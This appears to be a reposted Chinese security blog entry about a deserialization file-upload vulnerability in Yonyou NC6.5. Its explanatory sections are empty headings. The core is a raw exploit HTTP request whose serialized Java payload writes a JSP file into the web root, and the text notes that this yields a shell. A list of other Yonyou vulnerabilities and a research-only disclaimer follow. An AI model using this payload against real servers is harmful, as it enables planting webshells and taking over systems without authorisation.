文章简介
网络测绘
漏洞影响
复现过程
利用请求包
POST /servlet/FileReceiveServlet HTTP/1.1Host: xxx.com:8090User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: multipart/form-data;Referer: https://google.comContent-Length: 149¬ísrjava.util.HashMapÚÁÃ`ÑFloadFactorI thresholdxp?@wt FILE_NAMEt t00ls.jsptTARGET_FILE_PATHt./webapps/nc_webxsasaa
可直接getshell
nuclei-pocs
用友漏洞待更新记录(已更新17)
-
用友 U8 OA test.jsp SQL注入漏洞
-
用友nc v6.5 远程命令执行漏洞(CNVD-2021-30167)
-
用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞
-
用友 畅捷通T+ RecoverPassword.aspx 管理员密码修改漏洞
-
用友 畅捷通T+ Upload.aspx 任意文件上传漏洞
-
用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞
-
用友 NC NCFindWeb 任意文件读取漏洞
-
用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
-
用友 GRP-U8 UploadFileData 任意文件上传漏洞
-
用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
-
用友nc 控制台绕过漏洞
-
用友 NC 系统 uapws wsdl XXE(2022hw)
-
用友时空KSOA软件前台文件上传漏洞(2022hw)
-
用友nc v6.5 反射型xss
-
用友nc接口信息泄露漏洞
-
用友GRP-U8 财务管理软件servlet
-
用友NC6.5反序列化文件上传漏洞
-
用友 NCCloud FS文件管理SQL注入
-
用友nc v6.5 反序列化漏洞 补丁绕过
-
用友nc v6.5 反序列化漏洞
-
(CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞
-
用友nc IUFO v5
原文始发于微信公众号(北极星sec):用友NC6.5反序列化文件上传漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论